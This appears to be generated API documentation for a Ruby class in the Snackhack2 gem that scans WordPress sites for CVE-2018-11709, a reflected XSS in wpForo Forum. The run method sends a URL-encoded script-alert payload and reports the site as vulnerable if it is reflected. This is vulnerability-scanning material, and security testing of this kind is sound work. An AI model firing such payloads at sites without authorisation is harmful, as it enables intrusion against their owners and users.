Class: Snackhack2::WPForoForum

Inherits:

Object

Object
Snackhack2::WPForoForum

show all

Defined in:: lib/snackhack2/wpForo_Forum.rb

Instance Method Summary collapse

#initialize(site) ⇒ WPForoForum constructor

A new instance of WPForoForum.
#run ⇒ Object

wpForo Forum <= 1.4.11 - Unauthenticated Reflected Cross-Site Scripting (XSS) source: github.com/prok3z/Wordpress-Exploits/tree/main/CVE-2018-11709.

Constructor Details

#initialize(site) ⇒ `WPForoForum`

Returns a new instance of WPForoForum.



6
7
8

# File 'lib/snackhack2/wpForo_Forum.rb', line 6

def initialize(site)
  @site = site
end

Instance Method Details

#run ⇒ `Object`

wpForo Forum <= 1.4.11 - Unauthenticated Reflected Cross-Site Scripting (XSS) source: github.com/prok3z/Wordpress-Exploits/tree/main/CVE-2018-11709

# File 'lib/snackhack2/wpForo_Forum.rb', line 12

def run
  wp = HTTParty.get(File.join(@site, '/index.php/community/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E'))
  if wp.code == 200
    puts "[+] #{@site} is vulnerable to CVE-2018-11709..." if wp.match(/XSS/)
  else
    puts "[+] HTTP code #{wp.code}"
  end
end